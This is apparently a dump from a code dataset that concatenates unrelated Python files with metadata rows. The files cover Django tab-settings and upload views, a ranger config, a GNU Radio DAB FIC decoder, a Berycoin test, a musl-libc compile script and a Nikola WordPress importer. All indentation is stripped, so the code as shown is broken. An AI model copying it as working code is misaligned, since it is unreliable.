if _settings_form.is_valid():
_settings_form.save()
return redirect_and_flash_success(
request,
"Tab settings updated!",
path=reverse("settings_form")
)
return render( # Allows for proper validation checking
request, "tab/settings_form.html", {
"form": settings_form,
})
_settings_form = SettingsForm(settings=yaml_settings)
return render(
request, "tab/settings_form.html", {
"form": _settings_form,
})
def upload_data(request):
team_info = {"errors": [], "uploaded": False}
judge_info = {"errors": [], "uploaded": False}
room_info = {"errors": [], "uploaded": False}
scratch_info = {"errors": [], "uploaded": False}
if request.method == "POST":
form = UploadDataForm(request.POST, request.FILES)
if form.is_valid():
if "team_file" in request.FILES:
team_info["errors"] = import_teams.import_teams(
request.FILES["team_file"])
team_info["uploaded"] = True
if "judge_file" in request.FILES:
judge_info["errors"] = import_judges.import_judges(
request.FILES["judge_file"])
judge_info["uploaded"] = True
if "room_file" in request.FILES:
room_info["errors"] = import_rooms.import_rooms(
request.FILES["room_file"])
room_info["uploaded"] = True
if "scratch_file" in request.FILES:
scratch_info["errors"] = import_scratches.import_scratches(
request.FILES["scratch_file"])
scratch_info["uploaded"] = True
if not team_info["errors"] + judge_info["errors"] + \
room_info["errors"] + scratch_info["errors"]:
return redirect_and_flash_success(request,
"Data imported successfully")
else:
form = UploadDataForm()
return render(
request, "common/data_upload.html", {
"form": form,
"title": "Upload Input Files",
"team_info": team_info,
"judge_info": judge_info,
"room_info": room_info,
"scratch_info": scratch_info
})
def force_cache_refresh(request):
key = request.GET.get("key", "")
cache_logic.invalidate_cache(key)
redirect_to = request.GET.get("next", "/")
return redirect_and_flash_success(request,
"Refreshed!",
path=redirect_to)
@permission_required("tab.tab_settings.can_change", login_url="/403/")
def generate_archive(request):
tournament_name = request.META["SERVER_NAME"].split(".")[0]
filename = tournament_name + ".xml"
xml = ArchiveExporter(tournament_name).export_tournament()
response = HttpResponse(xml, content_type="text/xml; charset=utf-8")
response["Content-Length"] = len(xml)
response["Content-Disposition"] = "attachment; filename=%s" % filename
return response
| mit | 2,092,619,775,941,231,000 | 33.588517 | 88 | 0.572832 | false |
AlanWarren/dotfiles | .config/ranger/apps_bak.py | 1 | 7092 | # Copyright (C) 2009, 2010 Roman Zimbelmann <[email protected]>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
This is the default ranger configuration file for filetype detection
and application handling.
You can place this file in your ~/.ranger/ directory and it will be used
instead of this one. Though, to minimize your effort when upgrading ranger,
you may want to subclass CustomApplications rather than making a full copy.
This example modifies the behaviour of "feh" and adds a custom media player:
#### start of the ~/.ranger/apps.py example
from ranger.defaults.apps import CustomApplications as DefaultApps
from ranger.api.apps import *
class CustomApplications(DefaultApps):
def app_kaffeine(self, c):
return tup('kaffeine', *c)
def app_feh_fullscreen_by_default(self, c):
return tup('feh', '-F', *c)
def app_default(self, c):
f = c.file #shortcut
if f.video or f.audio:
return self.app_kaffeine(c)
if f.image and c.mode == 0:
return self.app_feh_fullscreen_by_default(c)
return DefaultApps.app_default(self, c)
#### end of the example
"""
from ranger.api.apps import *
from ranger.ext.get_executables import get_executables
class CustomApplications(Applications):
def app_default(self, c):
"""How to determine the default application?"""
f = c.file
if f.basename.lower() == 'makefile':
return self.either(c, 'make')
if f.extension is not None:
if f.extension in ('pdf', ):
c.flags += 'd'
return self.either(c, 'evince', 'zathura', 'apvlv')
if f.extension in ('xml', ):
return self.either(c, 'editor')
if f.extension in ('html', 'htm', 'xhtml'):
return self.either(c, 'vim', 'gvim', 'nano')
if f.extension in ('swf', ):
return self.either(c, 'firefox', 'opera')
if f.extension == 'nes':
return self.either(c, 'fceux')
if f.extension in ('swc', 'smc'):
return self.either(c, 'zsnes')
if f.mimetype is not None:
if INTERPRETED_LANGUAGES.match(f.mimetype):
return self.either(c, 'edit_or_run')
if f.container:
return self.either(c, 'aunpack', 'file_roller')
if f.video or f.audio:
if f.video:
c.flags += 'd'
return self.either(c, 'mplayer', 'totem', 'ffmpeg')
if f.image:
return self.either(c, 'feh', 'eog', 'mirage')
if f.document or f.filetype.startswith('text'):
return self.either(c, 'vim')
# ----------------------------------------- application definitions
# Note: Trivial applications are defined at the bottom
def app_pager(self, c):
return tup('less', *c)
def app_editor(self, c):
try:
c.flags += 'd'
default_editor = os.environ['EDITOR']
except KeyError:
pass
else:
parts = default_editor.split()
exe_name = os.path.basename(parts[0])
if exe_name in get_executables():
return tuple(parts) + tuple(c)
return self.either(c, 'vim', 'emacs', 'nano')
def app_edit_or_run(self, c):
if c.mode is 1:
return self.app_self(c)
return self.app_editor(c)
@depends_on('mplayer')
def app_mplayer(self, c):
if c.mode is 1:
return tup('mplayer', '-fs', *c)
elif c.mode is 2:
args = "mplayer -fs -sid 0 -vfm ffmpeg -lavdopts " \
"lowres=1:fast:skiploopfilter=all:threads=8".split()
args.extend(c)
return tup(*args)
elif c.mode is 3:
return tup('mplayer', '-mixer', 'software', *c)
else:
return tup('mplayer', *c)
@depends_on('feh')
def app_feh(self, c):
arg = {1: '--bg-scale', 2: '--bg-tile', 3: '--bg-center'}
c.flags += 'd'
if c.mode in arg: # mode 1, 2 and 3 will set the image as the background
return tup('feh', arg[c.mode], c.file.path)
if c.mode is 11 and len(c.files) is 1: # view all files in the cwd
images = (f.basename for f in self.fm.env.cwd.files if f.image)
return tup('feh', '-w', '--start-at', c.file.basename, *images)
if c.mode is 12: # fullscreen
return tup('feh', '-F', *c)
if c.mode is 13: # index mode
return tup('feh', '-I', *c)
if c.mode is 14: # thumbnail
return tup('feh', '-t', *c)
@depends_on('aunpack')
def app_aunpack(self, c):
if c.mode is 0:
c.flags += 'p'
return tup('aunpack', '-l', c.file.path)
return tup('aunpack', c.file.path)
@depends_on('file-roller')
def app_file_roller(self, c):
c.flags += 'd'
return tup('file-roller', c.file.path)
@depends_on('make')
def app_make(self, c):
if c.mode is 0:
return tup("make")
if c.mode is 1:
return tup("make", "install")
if c.mode is 2:
return tup("make", "clear")
@depends_on('ffmpeg')
def app_ffmpeg(self, c):
def strip_extensions(file):
if '.' in file.basename:
fp = file.path[:file.path.index('.')]
return os.path.basename(fp)
return os.path.basename(file.path)
files_without_extensions = map(strip_extensions, c.files)
for i in xrange(len(files_without_extensions)):
files_without_extensions[i] = files_without_extensions[i] + '.flv'
def list_to_string(file):
return " ".join(["%s" % el for el in file])
if c.mode is 0:
return "ffmpeg -i " + c.file.basename + " -ar 44100 -sameq -f flv " + list_to_string(files_without_extensions)
@depends_on('java')
def app_java(self, c):
def strip_extensions(file):
if '.' in file.basename:
return file.path[:file.path.index('.')]
return file.path
files_without_extensions = map(strip_extensions, c.files)
return tup("java", files_without_extensions)
@depends_on('totem')
def app_totem(self, c):
if c.mode is 0:
return tup("totem", *c)
if c.mode is 1:
return tup("totem", "--fullscreen", *c)
# Often a programs invocation is trivial. For example:
# vim test.py readme.txt [...]
# This could be implemented like:
@depends_on('vim')
def app_vim(self, c):
if c.mode is 0:
return tup("vim", *c)
#@depends_on('vim')
#def app_vim(self, c):
#return tup("urxvtc", "-e", "vim", *c.files)
app_editor = app_vim
# Instead of creating such a generic function for each program, just add
# its name here and it will be automatically done for you.
CustomApplications.generic('vim', 'fceux', 'elinks', 'wine',
'zsnes', 'javac')
# By setting flags='d', this programs will not block ranger's terminal:
CustomApplications.generic('opera', 'firefox', 'apvlv', 'evince',
'zathura', 'gimp', 'mirage', 'eog', flags='d')
# What filetypes are recognized as scripts for interpreted languages?
# This regular expression is used in app_default()
INTERPRETED_LANGUAGES = re.compile(r'''
^(text|application)/x-(
haskell|perl|python|ruby|sh
)$''', re.VERBOSE)
| gpl-2.0 | -5,672,769,681,852,613,000 | 29.437768 | 114 | 0.656796 | false |
andrmuel/gr-dab | python/fic.py | 1 | 7506 | #!/usr/bin/env python
#
# Copyright 2008 Free Software Foundation, Inc.
#
# This file is part of GNU Radio
#
# GNU Radio is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3, or (at your option)
# any later version.
#
# GNU Radio is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with GNU Radio; see the file COPYING. If not, write to
# the Free Software Foundation, Inc., 51 Franklin Street,
# Boston, MA 02110-1301, USA.
#
# Andreas Mueller, 2008
# [email protected]
from gnuradio import gr, trellis, blocks
from . import grdab_swig as grdab
from math import sqrt
"""
DAB FIC layer
"""
class fic_decode(gr.hier_block2):
"""
@brief block to decode FIBs (fast information blocks) from the FIC (fast information channel) of a demodulated DAB signal
- get FIBs from byte stream
- do convolutional decoding
- undo energy dispersal
- get FIC information
"""
def __init__(self, dab_params, verbose=False, debug=False):
"""
Hierarchical block for FIC decoding
@param dab_params DAB parameter object (grdab.parameters.dab_parameters)
"""
gr.hier_block2.__init__(self, "fic",
gr.io_signature(1, 1, gr.sizeof_float * dab_params.num_carriers * 2),
gr.io_signature(1, 1, gr.sizeof_char * 32))
self.dp = dab_params
self.verbose = verbose
self.debug = debug
# FIB selection and block partitioning
self.select_fic_syms = grdab.select_vectors(gr.sizeof_float, self.dp.num_carriers * 2, self.dp.num_fic_syms, 0)
self.repartition_fic = grdab.repartition_vectors(gr.sizeof_float, self.dp.num_carriers * 2,
self.dp.fic_punctured_codeword_length, self.dp.num_fic_syms,
self.dp.num_cifs)
# unpuncturing
self.unpuncture = grdab.unpuncture_vff(self.dp.assembled_fic_puncturing_sequence, 0)
# convolutional coding
# self.fsm = trellis.fsm(self.dp.conv_code_in_bits, self.dp.conv_code_out_bits, self.dp.conv_code_generator_polynomials)
self.fsm = trellis.fsm(1, 4, [0o133, 0o171, 0o145, 0o133]) # OK (dumped to text and verified partially)
self.conv_v2s = blocks.vector_to_stream(gr.sizeof_float, self.dp.fic_conv_codeword_length)
# self.conv_decode = trellis.viterbi_combined_fb(self.fsm, 20, 0, 0, 1, [1./sqrt(2),-1/sqrt(2)] , trellis.TRELLIS_EUCLIDEAN)
table = [
0, 0, 0, 0,
0, 0, 0, 1,
0, 0, 1, 0,
0, 0, 1, 1,
0, 1, 0, 0,
0, 1, 0, 1,
0, 1, 1, 0,
0, 1, 1, 1,
1, 0, 0, 0,
1, 0, 0, 1,
1, 0, 1, 0,
1, 0, 1, 1,
1, 1, 0, 0,
1, 1, 0, 1,
1, 1, 1, 0,
1, 1, 1, 1
]
assert (len(table) / 4 == self.fsm.O())
table = [(1 - 2 * x) / sqrt(2) for x in table]
self.conv_decode = trellis.viterbi_combined_fb(self.fsm, 774, 0, 0, 4, table, trellis.TRELLIS_EUCLIDEAN)
#self.conv_s2v = blocks.stream_to_vector(gr.sizeof_char, 774)
self.conv_prune = grdab.prune(gr.sizeof_char, self.dp.fic_conv_codeword_length / 4, 0,
self.dp.conv_code_add_bits_input)
# energy dispersal
self.prbs_src = blocks.vector_source_b(self.dp.prbs(self.dp.energy_dispersal_fic_vector_length), True)
#self.energy_v2s = blocks.vector_to_stream(gr.sizeof_char, self.dp.energy_dispersal_fic_vector_length)
self.add_mod_2 = blocks.xor_bb()
self.energy_s2v = blocks.stream_to_vector(gr.sizeof_char, self.dp.energy_dispersal_fic_vector_length)
self.cut_into_fibs = grdab.repartition_vectors(gr.sizeof_char, self.dp.energy_dispersal_fic_vector_length,
self.dp.fib_bits, 1, self.dp.energy_dispersal_fic_fibs_per_vector)
# connect all
self.nullsink = blocks.null_sink(gr.sizeof_char)
self.pack = blocks.unpacked_to_packed_bb(1, gr.GR_MSB_FIRST)
self.fibout = blocks.stream_to_vector(1, 32)
# self.filesink = gr.file_sink(gr.sizeof_char, "debug/fic.dat")
self.fibsink = grdab.fib_sink_vb()
# self.connect((self,0), (self.select_fic_syms,0), (self.repartition_fic,0), self.unpuncture, self.conv_v2s, self.conv_decode, self.conv_s2v, self.conv_prune, self.energy_v2s, self.add_mod_2, self.energy_s2v, (self.cut_into_fibs,0), gr.vector_to_stream(1,256), gr.unpacked_to_packed_bb(1,gr.GR_MSB_FIRST), self.filesink)
self.connect((self, 0),
(self.select_fic_syms, 0),
(self.repartition_fic, 0),
self.unpuncture,
self.conv_v2s,
self.conv_decode,
#self.conv_s2v,
self.conv_prune,
#self.energy_v2s,
self.add_mod_2,
self.energy_s2v,
(self.cut_into_fibs, 0),
blocks.vector_to_stream(1, 256),
self.pack,
self.fibout,
self.fibsink)
self.connect(self.fibout, self)
self.connect(self.prbs_src, (self.add_mod_2, 1))
if self.debug:
self.connect((self, 0), blocks.file_sink(gr.sizeof_float * self.dp.num_carriers * 2, "debug/transmission_frame.dat"))
self.connect((self, 1), blocks.file_sink(gr.sizeof_char, "debug/transmission_frame_trigger.dat"))
self.connect(self.select_fic_syms, blocks.file_sink(gr.sizeof_float * self.dp.num_carriers * 2, "debug/fic_select_syms.dat"))
self.connect(self.repartition_fic, blocks.file_sink(gr.sizeof_float * self.dp.fic_punctured_codeword_length, "debug/fic_repartitioned.dat"))
self.connect(self.unpuncture, blocks.file_sink(gr.sizeof_float * self.dp.fic_conv_codeword_length, "debug/fic_unpunctured.dat"))
self.connect(self.conv_decode, blocks.file_sink(gr.sizeof_char, "debug/fic_decoded.dat"))
self.connect(self.conv_prune, blocks.file_sink(gr.sizeof_char, "debug/fic_decoded_pruned.dat"))
#self.connect(self.conv_decode, blocks.file_sink(gr.sizeof_char * self.dp.energy_dispersal_fic_vector_length, "debug/fic_energy_dispersal_undone.dat"))
self.connect(self.pack, blocks.file_sink(gr.sizeof_char, "debug/fic_energy_undone.dat"))
def get_ensemble_info(self):
return self.fibsink.get_ensemble_info()
def get_service_info(self):
return self.fibsink.get_service_info()
def get_service_labels(self):
return self.fibsink.get_service_labels()
def get_subch_info(self):
return self.fibsink.get_subch_info()
def get_programme_type(self):
return self.fibsink.get_programme_type()
def get_crc_passed(self):
return self.fibsink.get_crc_passed()
def set_print_channel_info(self, val):
self.fibsink.set_print_channel_info(val)
| gpl-3.0 | 1,466,706,085,345,232,100 | 45.333333 | 328 | 0.602718 | false |
berycoin-project/berycoin | test/functional/berycoin-spend-op-call.py | 1 | 2271 | #!/usr/bin/env python3
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import *
from test_framework.script import *
from test_framework.mininode import *
from test_framework.berycoin import *
from test_framework.address import *
from test_framework.blocktools import *
import time
import io
class BerycoinSpendOpCallTest(BitcoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 1
def run_test(self):
self.nodes[0].generate(10+COINBASE_MATURITY)
# Create a new contract that can receive funds
"""
pragma solidity ^0.4.12;
contract Test {
function () payable {}
}
"""
contract_bytecode = "60606040523415600e57600080fd5b5b603580601c6000396000f30060606040525b5b5b0000a165627a7a723058202a205a0473a338a161903e98bd0920e9c01b9ab0a8f94f8f19028c49733fb60d0029"
first_contract_address = self.nodes[0].createcontract(contract_bytecode)['address']
self.nodes[0].generate(1)
# Send 100000 berycoin to the contract
self.nodes[0].sendtocontract(first_contract_address, "00", 100000)['txid']
blockhash = self.nodes[0].generate(1)[0]
prev_block = self.nodes[0].getblock(blockhash)
# Extract the transaction which will be the prevout to spend the contract's funds later on
op_call_txid = prev_block['tx'][-1]
block = create_block(int(prev_block['hash'], 16), create_coinbase(prev_block['height']+1), prev_block['time']+1)
block.hashStateRoot = int(prev_block['hashStateRoot'], 16)
block.hashUTXORoot = int(prev_block['hashUTXORoot'], 16)
tx = CTransaction()
tx.vin = [CTxIn(COutPoint(int(op_call_txid, 16), 0), scriptSig=CScript([]))]
tx.vout = [CTxOut(int(100000*COIN), scriptPubKey=CScript([OP_TRUE]))]
block.vtx.append(tx)
block.hashMerkleRoot = block.calc_merkle_root()
block.solve()
block_count = self.nodes[0].getblockcount()
ret = self.nodes[0].submitblock(bytes_to_hex_str(block.serialize()))
assert_equal(self.nodes[0].getblockcount(), block_count)
if __name__ == '__main__':
BerycoinSpendOpCallTest().main()
| gpl-3.0 | -3,772,808,376,688,454,700 | 38.155172 | 192 | 0.672831 | false |
windelbouwman/ppci-mirror | tools/compile_musl_libc.py | 1 | 2076 |
""" Helper script to help in compilation of the musl libc.
See for the musl library:
https://www.musl-libc.org/
"""
import os
import logging
import glob
import time
import traceback
from ppci.api import cc
from ppci.lang.c import COptions
from ppci.common import CompilerError, logformat
home = os.environ['HOME']
musl_folder = os.path.join(home, 'GIT', 'musl')
cache_filename = os.path.join(musl_folder, 'ppci_build.cache')
def do_compile(filename):
include_paths = [
os.path.join(musl_folder, 'include'),
os.path.join(musl_folder, 'src', 'internal'),
os.path.join(musl_folder, 'obj', 'include'),
os.path.join(musl_folder, 'arch', 'x86_64'),
os.path.join(musl_folder, 'arch', 'generic'),
]
coptions = COptions()
coptions.add_include_paths(include_paths)
with open(filename, 'r') as f:
obj = cc(f, 'x86_64', coptions=coptions)
return obj
def main():
t1 = time.time()
print('Using musl folder:', musl_folder)
crypt_md5_c = os.path.join(musl_folder, 'src', 'crypt', 'crypt_md5.c')
failed = 0
passed = 0
# file_pattern = os.path.join(musl_folder, 'src', 'crypt', '*.c')
# file_pattern = os.path.join(musl_folder, 'src', 'string', '*.c')
file_pattern = os.path.join(musl_folder, 'src', 'regex', '*.c')
for filename in glob.iglob(file_pattern):
print('==> Compiling', filename)
try:
do_compile(filename)
except CompilerError as ex:
print('Error:', ex.msg, ex.loc)
ex.print()
traceback.print_exc()
failed += 1
# break
except Exception as ex:
print('General exception:', ex)
traceback.print_exc()
failed += 1
# break
else:
print('Great success!')
passed += 1
t2 = time.time()
elapsed = t2 - t1
print('Passed:', passed, 'failed:', failed, 'in', elapsed, 'seconds')
if __name__ == '__main__':
logging.basicConfig(level=logging.INFO, format=logformat)
main()
| bsd-2-clause | -8,647,182,432,270,367,000 | 27.833333 | 74 | 0.587187 | false |
wcmckee/nikola | nikola/plugins/command/import_wordpress.py | 1 | 52729 | # -*- coding: utf-8 -*-
# Copyright © 2012-2016 Roberto Alsina and others.
# Permission is hereby granted, free of charge, to any
# person obtaining a copy of this software and associated
# documentation files (the "Software"), to deal in the
# Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the
# Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice
# shall be included in all copies or substantial portions of
# the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR
# PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS
# OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR
# OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
# OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""Import a WordPress dump."""
from __future__ import unicode_literals, print_function
import os
import re
import sys
import datetime
import io
import json
import requests
from lxml import etree
from collections import defaultdict
try:
import html2text
except:
html2text = None
try:
from urlparse import urlparse
from urllib import unquote
except ImportError:
from urllib.parse import urlparse, unquote # NOQA
try:
import phpserialize
except ImportError:
phpserialize = None # NOQA
from nikola.plugin_categories import Command
from nikola import utils
from nikola.utils import req_missing, unicode_str
from nikola.plugins.basic_import import ImportMixin, links
from nikola.nikola import DEFAULT_TRANSLATIONS_PATTERN
from nikola.plugins.command.init import SAMPLE_CONF, prepare_config, format_default_translations_config
LOGGER = utils.get_logger('import_wordpress', utils.STDERR_HANDLER)
def install_plugin(site, plugin_name, output_dir=None, show_install_notes=False):
"""Install a Nikola plugin."""
LOGGER.notice("Installing plugin '{0}'".format(plugin_name))
# Get hold of the 'plugin' plugin
plugin_installer_info = site.plugin_manager.getPluginByName('plugin', 'Command')
if plugin_installer_info is None:
LOGGER.error('Internal error: cannot find the "plugin" plugin which is supposed to come with Nikola!')
return False
if not plugin_installer_info.is_activated:
# Someone might have disabled the plugin in the `conf.py` used
site.plugin_manager.activatePluginByName(plugin_installer_info.name)
plugin_installer_info.plugin_object.set_site(site)
plugin_installer = plugin_installer_info.plugin_object
# Try to install the requested plugin
options = {}
for option in plugin_installer.cmd_options:
options[option['name']] = option['default']
options['install'] = plugin_name
options['output_dir'] = output_dir
options['show_install_notes'] = show_install_notes
if plugin_installer.execute(options=options) > 0:
return False
# Let the plugin manager find newly installed plugins
site.plugin_manager.collectPlugins()
# Re-scan for compiler extensions
site.compiler_extensions = site._activate_plugins_of_category("CompilerExtension")
return True
class CommandImportWordpress(Command, ImportMixin):
"""Import a WordPress dump."""
name = "import_wordpress"
needs_config = False
doc_usage = "[options] wordpress_export_file"
doc_purpose = "import a WordPress dump"
cmd_options = ImportMixin.cmd_options + [
{
'name': 'exclude_drafts',
'long': 'no-drafts',
'short': 'd',
'default': False,
'type': bool,
'help': "Don't import drafts",
},
{
'name': 'exclude_privates',
'long': 'exclude-privates',
'default': False,
'type': bool,
'help': "Don't import private posts",
},
{
'name': 'include_empty_items',
'long': 'include-empty-items',
'default': False,
'type': bool,
'help': "Include empty posts and pages",
},
{
'name': 'squash_newlines',
'long': 'squash-newlines',
'default': False,
'type': bool,
'help': "Shorten multiple newlines in a row to only two newlines",
},
{
'name': 'no_downloads',
'long': 'no-downloads',
'default': False,
'type': bool,
'help': "Do not try to download files for the import",
},
{
'name': 'download_auth',
'long': 'download-auth',
'default': None,
'type': str,
'help': "Specify username and password for HTTP authentication (separated by ':')",
},
{
'name': 'separate_qtranslate_content',
'long': 'qtranslate',
'default': False,
'type': bool,
'help': "Look for translations generated by qtranslate plugin",
# WARNING: won't recover translated titles that actually
# don't seem to be part of the wordpress XML export at the
# time of writing :(
},
{
'name': 'translations_pattern',
'long': 'translations_pattern',
'default': None,
'type': str,
'help': "The pattern for translation files names",
},
{
'name': 'export_categories_as_categories',
'long': 'export-categories-as-categories',
'default': False,
'type': bool,
'help': "Export categories as categories, instead of treating them as tags",
},
{
'name': 'export_comments',
'long': 'export-comments',
'default': False,
'type': bool,
'help': "Export comments as .wpcomment files",
},
{
'name': 'html2text',
'long': 'html2text',
'default': False,
'type': bool,
'help': "Uses html2text (needs to be installed with pip) to transform WordPress posts to MarkDown during import",
},
{
'name': 'transform_to_markdown',
'long': 'transform-to-markdown',
'default': False,
'type': bool,
'help': "Uses WordPress page compiler to transform WordPress posts to HTML and then use html2text to transform them to MarkDown during import",
},
{
'name': 'transform_to_html',
'long': 'transform-to-html',
'default': False,
'type': bool,
'help': "Uses WordPress page compiler to transform WordPress posts directly to HTML during import",
},
{
'name': 'use_wordpress_compiler',
'long': 'use-wordpress-compiler',
'default': False,
'type': bool,
'help': "Instead of converting posts to markdown, leave them as is and use the WordPress page compiler",
},
{
'name': 'install_wordpress_compiler',
'long': 'install-wordpress-compiler',
'default': False,
'type': bool,
'help': "Automatically installs the WordPress page compiler (either locally or in the new site) if required by other options.\nWarning: the compiler is GPL software!",
},
{
'name': 'tag_sanitizing_strategy',
'long': 'tag-sanitizing-strategy',
'default': 'first',
'help': 'lower: Convert all tag and category names to lower case\nfirst: Keep first spelling of tag or category name',
},
{
'name': 'one_file',
'long': 'one-file',
'default': False,
'type': bool,
'help': "Save imported posts in the more modern one-file format.",
},
]
all_tags = set([])
def _get_compiler(self):
"""Return whatever compiler we will use."""
self._find_wordpress_compiler()
if self.wordpress_page_compiler is not None:
return self.wordpress_page_compiler
plugin_info = self.site.plugin_manager.getPluginByName('markdown', 'PageCompiler')
if plugin_info is not None:
if not plugin_info.is_activated:
self.site.plugin_manager.activatePluginByName(plugin_info.name)
plugin_info.plugin_object.set_site(self.site)
return plugin_info.plugin_object
else:
LOGGER.error("Can't find markdown post compiler.")
def _find_wordpress_compiler(self):
"""Find WordPress compiler plugin."""
if self.wordpress_page_compiler is not None:
return
plugin_info = self.site.plugin_manager.getPluginByName('wordpress', 'PageCompiler')
if plugin_info is not None:
if not plugin_info.is_activated:
self.site.plugin_manager.activatePluginByName(plugin_info.name)
plugin_info.plugin_object.set_site(self.site)
self.wordpress_page_compiler = plugin_info.plugin_object
def _read_options(self, options, args):
"""Read command-line options."""
options['filename'] = args.pop(0)
if args and ('output_folder' not in args or
options['output_folder'] == 'new_site'):
options['output_folder'] = args.pop(0)
if args:
LOGGER.warn('You specified additional arguments ({0}). Please consider '
'putting these arguments before the filename if you '
'are running into problems.'.format(args))
self.onefile = options.get('one_file', False)
self.import_into_existing_site = False
self.url_map = {}
self.timezone = None
self.wordpress_export_file = options['filename']
self.squash_newlines = options.get('squash_newlines', False)
self.output_folder = options.get('output_folder', 'new_site')
self.exclude_drafts = options.get('exclude_drafts', False)
self.exclude_privates = options.get('exclude_privates', False)
self.no_downloads = options.get('no_downloads', False)
self.import_empty_items = options.get('include_empty_items', False)
self.export_categories_as_categories = options.get('export_categories_as_categories', False)
self.export_comments = options.get('export_comments', False)
self.html2text = options.get('html2text', False)
self.transform_to_markdown = options.get('transform_to_markdown', False)
self.transform_to_html = options.get('transform_to_html', False)
self.use_wordpress_compiler = options.get('use_wordpress_compiler', False)
self.install_wordpress_compiler = options.get('install_wordpress_compiler', False)
self.wordpress_page_compiler = None
self.tag_saniziting_strategy = options.get('tag_saniziting_strategy', 'first')
self.auth = None
if options.get('download_auth') is not None:
username_password = options.get('download_auth')
self.auth = tuple(username_password.split(':', 1))
if len(self.auth) < 2:
LOGGER.error("Please specify HTTP authentication credentials in the form username:password.")
return False
self.separate_qtranslate_content = options.get('separate_qtranslate_content')
self.translations_pattern = options.get('translations_pattern')
count = (1 if self.html2text else 0) + (1 if self.transform_to_html else 0) + (1 if self.transform_to_markdown else 0)
if count > 1:
LOGGER.error("You can use at most one of the options --html2text, --transform-to-html and --transform-to-markdown.")
return False
if (self.html2text or self.transform_to_html or self.transform_to_markdown) and self.use_wordpress_compiler:
LOGGER.warn("It does not make sense to combine --use-wordpress-compiler with any of --html2text, --transform-to-html and --transform-to-markdown, as the latter convert all posts to HTML and the first option then affects zero posts.")
if (self.html2text or self.transform_to_markdown) and not html2text:
LOGGER.error("You need to install html2text via 'pip install html2text' before you can use the --html2text and --transform-to-markdown options.")
return False
if self.transform_to_html or self.transform_to_markdown:
self._find_wordpress_compiler()
if not self.wordpress_page_compiler and self.install_wordpress_compiler:
if not install_plugin(self.site, 'wordpress_compiler', output_dir='plugins'): # local install
return False
self._find_wordpress_compiler()
if not self.wordpress_page_compiler:
LOGGER.error("To compile WordPress posts to HTML, the WordPress post compiler is needed. You can install it via:")
LOGGER.error(" nikola plugin -i wordpress_compiler")
LOGGER.error("Please note that the WordPress post compiler is licensed under the GPL v2.")
return False
return True
def _prepare(self, channel):
"""Prepare context and category hierarchy."""
self.context = self.populate_context(channel)
self.base_dir = urlparse(self.context['BASE_URL']).path
if self.export_categories_as_categories:
wordpress_namespace = channel.nsmap['wp']
cat_map = dict()
for cat in channel.findall('{{{0}}}category'.format(wordpress_namespace)):
# cat_id = get_text_tag(cat, '{{{0}}}term_id'.format(wordpress_namespace), None)
cat_slug = get_text_tag(cat, '{{{0}}}category_nicename'.format(wordpress_namespace), None)
cat_parent_slug = get_text_tag(cat, '{{{0}}}category_parent'.format(wordpress_namespace), None)
cat_name = get_text_tag(cat, '{{{0}}}cat_name'.format(wordpress_namespace), None)
cat_path = [cat_name]
if cat_parent_slug in cat_map:
cat_path = cat_map[cat_parent_slug] + cat_path
cat_map[cat_slug] = cat_path
self._category_paths = dict()
for cat, path in cat_map.items():
self._category_paths[cat] = utils.join_hierarchical_category_path(path)
def _execute(self, options={}, args=[]):
"""Import a WordPress blog from an export file into a Nikola site."""
if not args:
print(self.help())
return False
if not self._read_options(options, args):
return False
# A place holder where extra language (if detected) will be stored
self.extra_languages = set()
if not self.no_downloads:
def show_info_about_mising_module(modulename):
LOGGER.error(
'To use the "{commandname}" command, you have to install '
'the "{package}" package or supply the "--no-downloads" '
'option.'.format(
commandname=self.name,
package=modulename)
)
if phpserialize is None:
req_missing(['phpserialize'], 'import WordPress dumps without --no-downloads')
channel = self.get_channel_from_file(self.wordpress_export_file)
self._prepare(channel)
conf_template = self.generate_base_site()
# If user has specified a custom pattern for translation files we
# need to fix the config
if self.translations_pattern:
self.context['TRANSLATIONS_PATTERN'] = self.translations_pattern
self.import_posts(channel)
self.context['TRANSLATIONS'] = format_default_translations_config(
self.extra_languages)
self.context['REDIRECTIONS'] = self.configure_redirections(
self.url_map, self.base_dir)
if self.timezone:
self.context['TIMEZONE'] = self.timezone
if self.export_categories_as_categories:
self.context['CATEGORY_ALLOW_HIERARCHIES'] = True
self.context['CATEGORY_OUTPUT_FLAT_HIERARCHY'] = True
# Add tag redirects
for tag in self.all_tags:
try:
if isinstance(tag, utils.bytes_str):
tag_str = tag.decode('utf8', 'replace')
else:
tag_str = tag
except AttributeError:
tag_str = tag
tag = utils.slugify(tag_str, self.lang)
src_url = '{}tag/{}'.format(self.context['SITE_URL'], tag)
dst_url = self.site.link('tag', tag)
if src_url != dst_url:
self.url_map[src_url] = dst_url
self.write_urlmap_csv(
os.path.join(self.output_folder, 'url_map.csv'), self.url_map)
rendered_template = conf_template.render(**prepare_config(self.context))
self.write_configuration(self.get_configuration_output_path(),
rendered_template)
if self.use_wordpress_compiler:
if self.install_wordpress_compiler:
